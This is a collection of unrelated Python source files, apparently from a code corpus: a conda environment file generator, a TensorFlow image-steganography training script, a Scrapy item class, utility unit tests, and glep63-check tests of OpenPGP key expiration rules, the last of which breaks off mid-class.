f.write("# {}\n".format(line))
f.write("name: {}\n".format(conda_env))
f.write("channels:\n")
for channel in CHANNELS:
f.write("- {}\n".format(channel))
f.write("dependencies:\n")
for conda_package in conda_packages.values():
f.write("- {}\n".format(conda_package))
f.write("- pip:\n")
for pip_package in pip_packages.values():
f.write(" - {}\n".format(pip_package))
print("Generated conda file: {}".format(conda_file))
print(HELP_MSG.format(conda_env=conda_env))
|
py | 1a37efe350a78e2f3945d6ca9b23e7dd0b1de9d7 | # from __future__ import absolute_import
# from __future__ import division
# from __future__ import print_function
import os
import time
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
import numpy as np
# import cv2
import tensorflow as tf
from tensorflow.data import Iterator
from Dataset import SegDataLoader, VocRgbDataLoader, VocDataLoader, LfwRgbDataLoader, ImageNetRgbDataLoader
from visulize import save_test_images
from utils import rgb2yuv_tf, yuv2rgb_tf
from model import Discriminator, encode_net, decode_net
from ResNet import resnet_nopooling
class Model():
def __init__(self):
self.run_time = time.strftime("%m%d-%H%M")
# self.learning_rate = 0.0001
self.starter_learning_rate = 0.001
        self.epochs = 70
self.log_path = 'logs/'+self.run_time + '/'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
self.sess = tf.InteractiveSession(config=config)
self.secret_tensor = tf.placeholder(shape=[None, 256, 256, 3], dtype=tf.float32, name="secret_tensor")
self.cover_tensor = tf.placeholder(shape=[None, 256, 256, 3], dtype=tf.float32, name="cover_tensor")
self.cover_yuv = rgb2yuv_tf(self.cover_tensor)
self.secret_yuv = rgb2yuv_tf(self.secret_tensor)
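        # All reconstruction losses are computed in YUV space; tensors are
        # converted back to RGB only for summary images (see get_tensor_to_img_op).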
self.global_step_tensor = tf.Variable(0, trainable=False, name='global_step')
# self.test_op = self.prepare_test_graph(self.secret_tensor, self.cover_tensor)
def get_hiding_network_op(self, cover_tensor, secret_tensor, is_training):
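        # Hiding (encoder) network: concatenate cover and secret along the
        # channel axis and map the 6-channel input to a 3-channel stego image
        # with a pooling-free ResNet.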
concat_input = tf.concat([cover_tensor, secret_tensor], axis=-1, name='images_features_concat')
# output = resnet_nopooling(concat_input, name='encode', n_class=3, dilate=[2,4,8,16], is_training=is_training)
output = resnet_nopooling(concat_input, name='encode', n_class=3, is_training=is_training)
return output
def get_reveal_network_op(self, container_tensor, is_training):
output = resnet_nopooling(container_tensor, name='decode', n_class=3, is_training=is_training)
return output
    def get_noise_layer_op(self, tensor, std=.1):
        # Noise injection is currently disabled: the tensor passes through
        # unchanged and `std` is ignored. The commented lines preserve the
        # original additive-Gaussian variant.
        # with tf.variable_scope("noise_layer"):
        #     return tensor + tf.random_normal(shape=tf.shape(tensor), mean=0.0, stddev=std, dtype=tf.float32)
        return tensor
def get_loss_op(self,secret_true,secret_pred,cover_true,cover_pred):
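        # Active loss: weighted L1 (absolute difference) plus per-channel
        # SSIM terms on both the revealed secret and the stego/cover image.
        # The commented-out Discriminator blocks below preserve a disabled
        # adversarial variant.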
# D_real_secret = Discriminator(secret_true)
# D_fake_secret = Discriminator(secret_pred, reusing=True)
# D_real = Discriminator(cover_true, reusing=True)
# D_fake = Discriminator(cover_pred, reusing=True)
# D_real_secret = Discriminator(secret_true, name='secret', reusing=False)
# D_fake_secret = Discriminator(secret_pred, name='secret', reusing=True)
# D_real = Discriminator(cover_true, name='cover', reusing=False)
# D_fake = Discriminator(cover_pred, name='cover', reusing=True)
#
# D_real = tf.concat([D_real, D_real_secret], axis=0, name='gan_true_concat')
# D_fake = tf.concat([D_fake, D_fake_secret], axis=0, name='gan_pred_concat')
#
# D_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_real, labels=tf.ones_like(D_real)) + tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.zeros_like(D_fake)))
# G_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=D_fake, labels=tf.ones_like(D_fake)))
with tf.variable_scope("huber_losses"):
# secret_mse = tf.losses.mean_squared_error(secret_true,secret_pred)
# cover_mse = tf.losses.mean_squared_error(cover_true,cover_pred)
# secret_mse = tf.reduce_mean(tf.losses.huber_loss(secret_true, secret_pred, delta=0.5))
# cover_mse = tf.reduce_mean(tf.losses.huber_loss(cover_true, cover_pred, delta=0.5))
secret_mse = tf.reduce_mean(tf.losses.absolute_difference(secret_true, secret_pred))
cover_mse = tf.reduce_mean(tf.losses.absolute_difference(cover_true, cover_pred))
with tf.variable_scope("ssim_losses"):
#secret_ssim = 1. - tf.reduce_mean(tf.image.ssim(secret_true, secret_pred, max_val=1.0))
#cover_ssim = 1. - tf.reduce_mean(tf.image.ssim(cover_true, cover_pred, max_val=1.0))
secret_ssim = 1. - (tf.reduce_mean(tf.image.ssim(secret_true[:,:,:,:1],secret_pred[:,:,:,:1], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(secret_true[:,:,:,1:2],secret_pred[:,:,:,1:2], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(secret_true[:,:,:,2:],secret_pred[...,2:], max_val=1.0)))/3.
cover_ssim = 1. - (tf.reduce_mean(tf.image.ssim(cover_true[:,:,:,:1],cover_pred[:,:,:,:1], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(cover_true[:,:,:,1:2],cover_pred[:,:,:,1:2], max_val=1.0)) + tf.reduce_mean(tf.image.ssim(cover_true[:,:,:,2:],cover_pred[:,:,:,2:], max_val=1.0)))/3.
# D_final_loss = cover_mse + secret_mse + secret_ssim + cover_ssim + D_loss
# D_final_loss = D_loss
G_final_loss = 5*cover_mse + 5*secret_mse + secret_ssim + cover_ssim
# G_final_loss = cover_mse + secret_mse + secret_ssim + cover_ssim
# return D_final_loss, G_final_loss, D_loss, G_loss, secret_mse, cover_mse, secret_ssim, cover_ssim
return G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim
def get_tensor_to_img_op(self,tensor):
with tf.variable_scope("",reuse=True):
# t = tensor*tf.convert_to_tensor([0.229, 0.224, 0.225]) + tf.convert_to_tensor([0.485, 0.456, 0.406])
tensor = yuv2rgb_tf(tensor)
return tf.clip_by_value(tensor,0,1)
# return tf.clip_by_value(tensor,0,255)
def prepare_training_graph(self,secret_tensor,cover_tensor,global_step_tensor):
hidden = self.get_hiding_network_op(cover_tensor=cover_tensor, secret_tensor=secret_tensor, is_training=True)
reveal_output_op = self.get_reveal_network_op(hidden, is_training=True)
G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = self.get_loss_op(secret_tensor,reveal_output_op,cover_tensor,hidden)
global_variables = tf.global_variables()
gan_varlist = [i for i in global_variables if i.name.startswith('Discriminator')]
en_de_code_varlist = [i for i in global_variables if i not in gan_varlist]
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
# train_op = optimiser.minimize(loss, global_step=global_step)
# D_minimize_op = tf.train.AdamOptimizer(self.learning_rate).minimize(D_final_loss, var_list=gan_varlist, global_step=global_step_tensor)
G_minimize_op = tf.train.AdamOptimizer(self.learning_rate).minimize(G_final_loss, var_list=en_de_code_varlist, global_step=global_step_tensor)
# G_minimize_op = tf.train.AdamOptimizer(self.learning_rate).minimize(G_final_loss, global_step=global_step_tensor)
# tf.summary.scalar('D_loss', D_final_loss,family='train')
tf.summary.scalar('G_loss', G_final_loss,family='train')
tf.summary.scalar('secret_mse', secret_mse,family='train')
tf.summary.scalar('cover_mse', cover_mse,family='train')
tf.summary.scalar('learning_rate', self.learning_rate,family='train')
tf.summary.scalar('secret_ssim', secret_ssim)
tf.summary.scalar('cover_ssim', cover_ssim)
tf.summary.image('secret',self.get_tensor_to_img_op(secret_tensor),max_outputs=1,family='train')
tf.summary.image('cover',self.get_tensor_to_img_op(cover_tensor),max_outputs=1,family='train')
tf.summary.image('hidden',self.get_tensor_to_img_op(hidden),max_outputs=1,family='train')
# tf.summary.image('hidden_noisy',self.get_tensor_to_img_op(noise_add_op),max_outputs=1,family='train')
tf.summary.image('revealed',self.get_tensor_to_img_op(reveal_output_op),max_outputs=1,family='train')
merged_summary_op = tf.summary.merge_all()
return G_minimize_op, G_final_loss, merged_summary_op, secret_mse,cover_mse, secret_ssim, cover_ssim
def prepare_test_graph(self,secret_tensor,cover_tensor):
# y_output, hiding_output_op = self.get_hiding_network_op(cover_tensor=cover_tensor,secret_tensor=secret_tensor, is_training=True)
hidden = self.get_hiding_network_op(cover_tensor=cover_tensor,secret_tensor=secret_tensor, is_training=False)
# reveal_output_op = self.get_reveal_network_op(y_output, is_training=True)
reveal_output_op = self.get_reveal_network_op(hidden, is_training=False)
G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = self.get_loss_op(secret_tensor,reveal_output_op,cover_tensor,hidden)
# tf.summary.scalar('loss', loss_op,family='test')
# tf.summary.scalar('reveal_net_loss', secret_loss_op,family='test')
# tf.summary.scalar('cover_net_loss', cover_loss_op,family='test')
#
# tf.summary.image('secret',self.get_tensor_to_img_op(secret_tensor),max_outputs=1,family='test')
# tf.summary.image('cover',self.get_tensor_to_img_op(cover_tensor),max_outputs=1,family='test')
# tf.summary.image('hidden',self.get_tensor_to_img_op(hiding_output_op),max_outputs=1,family='test')
# tf.summary.image('revealed',self.get_tensor_to_img_op(reveal_output_op),max_outputs=1,family='test')
# merged_summary_op = tf.summary.merge_all()
return hidden, reveal_output_op, G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim
def save_chkp(self,path):
global_step = self.sess.run(self.global_step_tensor)
self.saver.save(self.sess,path,global_step)
def load_chkp(self,path):
self.saver.restore(self.sess,path)
print("LOADED")
def train(self):
with tf.device('/cpu:0'):
# segdl = VocRgbDataLoader('/home/jion/moliq/Documents/VOC2012/JPEGImages/', 4, (256, 256), (256, 256), 'voc_train.txt', split='train')
# segdl_val = VocRgbDataLoader('/home/jion/moliq/Documents/VOC2012/JPEGImages/', 4, (256, 256), (256, 256), 'voc_valid.txt', split='val')
#segdl = LfwRgbDataLoader('/home/jion/moliq/Documents/lfw/', 2, (256, 256), (256, 256),
# 'dataset/lfw_train.txt', split='train')
#segdl_val = LfwRgbDataLoader('/home/jion/moliq/Documents/lfw/', 2, (256, 256), (256, 256),
# 'dataset/lfw_valid.txt', split='val')
segdl = ImageNetRgbDataLoader('/home/jion/moliq/Documents/imagenet/ILSVRC2012_img_val/', 4, (256, 256), (256, 256),
'dataset/imagenet_train.txt', split='train')
segdl_val = ImageNetRgbDataLoader('/home/jion/moliq/Documents/imagenet/ILSVRC2012_img_test/', 4, (256, 256), (256, 256),
'dataset/imagenet_valid.txt', split='val')
iterator = Iterator.from_structure(segdl.data_tr.output_types, segdl.data_tr.output_shapes)
iterator_val = Iterator.from_structure(segdl_val.data_tr.output_types, segdl_val.data_tr.output_shapes)
next_batch = iterator.get_next()
next_batch_val = iterator_val.get_next()
training_init_op = iterator.make_initializer(segdl.data_tr)
training_init_op_val = iterator_val.make_initializer(segdl_val.data_tr)
            steps_per_epoch = segdl.data_len // segdl.batch_size  # integer division so range() works in Python 3
            steps_per_epoch_val = segdl_val.data_len // segdl_val.batch_size
self.learning_rate = tf.train.exponential_decay(self.starter_learning_rate, self.global_step_tensor,
steps_per_epoch*15, 0.1, staircase=True)
self.train_op_G, G_final_loss, self.summary_op, self.secret_mse, self.cover_mse, self.secret_ssim, self.cover_ssim = \
self.prepare_training_graph(self.secret_yuv, self.cover_yuv, self.global_step_tensor)
if not os.path.exists(self.log_path):
os.makedirs(self.log_path)
self.writer = tf.summary.FileWriter(self.log_path, self.sess.graph)
self.sess.run(tf.global_variables_initializer())
self.saver = tf.train.Saver(max_to_keep=30)
# beta1_power = self.sess.graph.get_tensor_by_name('beta1_power:0')
# out = self.sess.run(beta1_power)
# print('beta1_power ', out)
# exclude_vars = ['beta1_power:0', 'beta2_power:0', 'global_step:0']
# exclude_vars = ['']
# restore_variables = [i for i in tf.global_variables() if not i.name in exclude_vars]
saver = tf.train.Saver()
loader = tf.train.latest_checkpoint('logs/0509-0030')
saver.restore(self.sess, loader)
print('loaded pretrained model')
#beta1_power = self.sess.graph.get_tensor_by_name('beta1_power:0')
#out = self.sess.run(beta1_power)
#print('beta1_power ', out)
        for epoch in range(1, 1 + self.epochs):
print('epoch %d'%epoch)
self.sess.run(training_init_op)
for i in range(steps_per_epoch):
cover_tensor, secret_tensor = self.sess.run(next_batch)
_, G_loss, secret_mse, cover_mse, secret_ssim, cover_ssim, summary, global_step = \
self.sess.run([self.train_op_G, G_final_loss, self.secret_mse, self.cover_mse, self.secret_ssim, self.cover_ssim, self.summary_op, self.global_step_tensor],
feed_dict={self.secret_tensor: secret_tensor, self.cover_tensor: cover_tensor})
self.writer.add_summary(summary, global_step)
# if i % 5 == 0:
# _, D_loss, summary = \
# self.sess.run([self.train_op_D, D_final_loss, self.summary_op],
# feed_dict={self.secret_tensor: secret_tensor,self.cover_tensor: cover_tensor})
# self.writer.add_summary(summary, global_step)
if i % 30 == 0:
print('Epoch [{}/{}] Step [{}/{}] G_Loss {:.4f} encoder_ssim {:.4f} encoder_mse {:.4f}'
' decoder_ssim {:.4f} decoder_mse {:.4f} '.format(
                        epoch, self.epochs, i, steps_per_epoch, G_loss,
cover_ssim, cover_mse, secret_ssim, secret_mse ))
# run validation
self.sess.run(training_init_op_val)
# D_loss_val_this_epoch = []
G_loss_val_this_epoch = []
secret_ssim_this_epoch = []
cover_ssim_this_epoch = []
for i in range(steps_per_epoch_val):
cover_tensor_val, secret_tensor_val = self.sess.run(next_batch_val)
G_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = \
self.sess.run([G_final_loss, self.secret_mse,self.cover_mse, self.secret_ssim, self.cover_ssim],
feed_dict={self.secret_tensor: secret_tensor_val,
self.cover_tensor: cover_tensor_val})
# D_loss_val_this_epoch.append(D_loss)
G_loss_val_this_epoch.append(G_loss)
secret_ssim_this_epoch.append(secret_ssim)
cover_ssim_this_epoch.append(cover_ssim)
# mean_D_loss_val_this_epoch = sum(D_loss_val_this_epoch) / len(D_loss_val_this_epoch)
mean_G_loss_val_this_epoch = sum(G_loss_val_this_epoch) / len(G_loss_val_this_epoch)
mean_secret_ssim_this_epoch = sum(secret_ssim_this_epoch) / len(secret_ssim_this_epoch)
mean_cover_ssim_this_epoch = sum(cover_ssim_this_epoch) / len(cover_ssim_this_epoch)
# print('global step: %d, validation loss: %.4f'%(global_step, mean_loss_val_this_epoch))
print('VALIDATION Epoch {} global step {} G_Loss {:.4f} encoder_ssim {:.4f} decoder_ssim {:.4f}'.format(
epoch, global_step, mean_G_loss_val_this_epoch,
mean_cover_ssim_this_epoch, mean_secret_ssim_this_epoch))
# self.save_chkp(self.log_path+'%d_%.3f.ckpt'%(epoch, mean_loss_val_this_epoch))
self.save_chkp(self.log_path)
def test_performance(self, log_path):
hiding_output_op, reveal_output_op, G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim = \
self.prepare_test_graph(self.secret_yuv, self.cover_yuv)
loader = tf.train.latest_checkpoint(log_path)
# from tensorflow.python.tools import inspect_checkpoint as chkp
# chkp.print_tensors_in_checkpoint_file(loader, tensor_name='', all_tensors=True)
# from inspect_checkpoint import print_tensors_in_checkpoint_file
# print_tensors_in_checkpoint_file(loader, tensor_name='', all_tensors=True)
# variables = [i for i in tf.global_variables() if i.name not in ['global_step:0']]
# saver_variables_dict = {value.name[:-2]:value for value in variables}
# custom_saver = tf.train.Saver(saver_variables_dict)
# custom_saver.restore(self.sess, loader)
# print('load model %s'%loader)
# self.saver = tf.train.Saver(var_list=tf.global_variables())
self.saver = tf.train.Saver()
self.saver.restore(self.sess, loader)
print('load model %s'%loader)
with tf.device('/cpu:0'):
# segdl_val = VocRgbDataLoader('/home/jion/moliq/Documents/VOC2012/JPEGImages/', 16, (256, 256), (256, 256), 'voc_valid.txt', split='val')
segdl_val = LfwRgbDataLoader('/home/jion/moliq/Documents/lfw/', 16, (256, 256), (256, 256),
'dataset/lfw_valid.txt', split='val')
iterator_val = Iterator.from_structure(segdl_val.data_tr.output_types, segdl_val.data_tr.output_shapes)
next_batch_val = iterator_val.get_next()
training_init_op_val = iterator_val.make_initializer(segdl_val.data_tr)
            steps_per_epoch_val = segdl_val.data_len // segdl_val.batch_size  # integer division so range() works in Python 3
loss_val_this_epoch = []
secret_mse_val_this_epoch = []
cover_mse_val_this_epoch = []
secret_ssim_this_epoch = []
cover_ssim_this_epoch = []
self.sess.run(training_init_op_val)
# self.saver.restore(self.sess, loader)
# print('load model %s'%loader)
for i in range(steps_per_epoch_val):
cover_tensor_val, secret_tensor_val = self.sess.run(next_batch_val)
stego, secret_reveal, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value = \
self.sess.run([hiding_output_op, reveal_output_op, G_final_loss, secret_mse, cover_mse, secret_ssim, cover_ssim],
feed_dict={self.secret_tensor: secret_tensor_val,
self.cover_tensor: cover_tensor_val})
cover_names = segdl_val.imgs_files[i*segdl_val.batch_size:(i+1)*segdl_val.batch_size]
secret_names = segdl_val.labels_files[i*segdl_val.batch_size:(i+1)*segdl_val.batch_size]
loss_val_this_epoch.append(loss_value)
secret_mse_val_this_epoch.append(secret_mse_value)
cover_mse_val_this_epoch.append(cover_mse_value)
secret_ssim_this_epoch.append(secret_ssim_value)
cover_ssim_this_epoch.append(cover_ssim_value)
if i%10 == 0:
print('%d %.3f %.3f %.3f %.3f %.3f'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value))
save_test_images(cover_names, secret_names, cover_tensor_val, secret_tensor_val, stego, secret_reveal, log_path)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_cover.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), cover_tensor_val)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_secret.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), secret_tensor_val)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_stego.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), stego)
# np.save('%d %.3f %.3f %.3f %.3f %.3f_secret_reveal.npy'%(i, loss_value, secret_mse_value, cover_mse_value, secret_ssim_value, cover_ssim_value), secret_reveal)
# mean_loss_val_this_epoch = sum(loss_val_this_epoch) / len(loss_val_this_epoch)
# mean_secret_mse_val_this_epoch = sum(secret_mse_val_this_epoch) / len(secret_mse_val_this_epoch)
# mean_cover_mse_val_this_epoch = sum(cover_mse_val_this_epoch) / len(cover_mse_val_this_epoch)
# mean_secret_ssim_this_epoch = sum(secret_ssim_this_epoch) / len(secret_ssim_this_epoch)
# mean_cover_ssim_this_epoch = sum(cover_ssim_this_epoch) / len(cover_ssim_this_epoch)
mean_loss_val_this_epoch = np.mean(loss_val_this_epoch)
mean_secret_mse_val_this_epoch = np.mean(secret_mse_val_this_epoch)
mean_cover_mse_val_this_epoch = np.mean(cover_mse_val_this_epoch)
mean_secret_ssim_this_epoch = np.mean(secret_ssim_this_epoch)
mean_cover_ssim_this_epoch = np.mean(cover_ssim_this_epoch)
print('validation loss: %.4f' % mean_loss_val_this_epoch)
print('secret mse: %.4f' % mean_secret_mse_val_this_epoch)
print('cover mse : %.4f' % mean_cover_mse_val_this_epoch)
print('secret ssim: %.4f' % mean_secret_ssim_this_epoch)
print('cover ssim: %.4f' % mean_cover_ssim_this_epoch)
if __name__ == '__main__':
train_model = Model()
train_model.train()
# train_model.test_performance(train_model.log_path)
# train_model.test_performance('logs/0427-1506')
# train_model.test_performance('logs/0428-2048')
# train_model.test_performance('logs/0505-1617')
|
py | 1a37eff129f46428a4a3eccdf02de101bd3c9704 | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class QuotesbotItem(scrapy.Item):
# define the fields for your item here like:
text = scrapy.Field()
author = scrapy.Field()
tags = scrapy.Field()
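# Illustrative usage from a spider callback (assumed context, not part of
# the original file):
#   item = QuotesbotItem(text='"A quote."', author='Author Name', tags=['life'])
#   yield item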
|
py | 1a37f07dec035377b85c773f9e604ca966899899 | # coding: utf-8
from unittest import TestCase
from forecast.utils import import_object, package_contents, camelize
class HelperFunctionsTest(TestCase):
def test_import_object(self):
module, imported_object = import_object("forecast.tests.settings.base.SETTINGS")
self.assertTrue(repr(module).startswith("<module 'forecast.tests.settings.base' from"))
self.assertIsInstance(imported_object, dict)
def test_fail_import_invalid_module(self):
self.assertRaises(ImportError, import_object, "forecast.tests.unknown")
def test_fail_import_invalid_object(self):
self.assertRaises(ImportError, import_object, "forecast.tests.settings.base.UNKNOWN")
def test_package_contents(self):
modules = package_contents("forecast.tests.test_app.commands")
self.assertIn("cmd", modules)
self.assertIn("__init__", modules)
def test_fail_package_contents_in_module(self):
self.assertRaises(ImportError, package_contents, "forecast.tests.test_app.commands.cmd")
def test_fail_package_contents_with_non_packages(self):
self.assertRaises(ImportError, package_contents, "forecast.tests.nonpackage")
def test_camelize_names(self):
self.assertEqual("Camel", camelize("camel"))
self.assertEqual("CamelCase", camelize("camel_case"))
self.assertEqual("CamelCaseFunctionTransformation", camelize("camel_case_function_transformation"))
self.assertEqual("CamelCase", camelize("camel__case"))
|
py | 1a37f0c5c16e03bffa20c462d42c89b452bd96eb | # glep63-check -- tests for issues related to key expiration
# (c) 2018-2019 Michał Górny
# Released under the terms of 2-clause BSD license.
import datetime
from glep63.base import (PublicKey, Key, UID, KeyAlgo, Validity,
KeyWarning, KeyIssue, SubKeyWarning, SubKeyIssue)
import tests.key_base
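# Each test case below pairs a fixture key file (KEY_FILE) with its raw
# `gpg --with-colons` listing (GPG_COLONS), the PublicKey structure it is
# expected to parse into (KEY), and the warnings/issues each GLEP 63 spec
# version should report for it (EXPECTED_RESULTS).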
class PrimaryKeyNoExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-noexpire.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247201::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=None,
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:none',
long_desc='',
),
],
}
class PrimaryKeyThreeYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-3y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1627855202::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247202::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2021, 8, 1, 22, 0, 2),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 2),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
}
class PrimaryKeyTwoYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-2y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1596319203::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247203::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2020, 8, 1, 22, 0, 3),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 3),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [],
}
class PrimaryKeyOneWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-1w.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1533852004::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247204::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
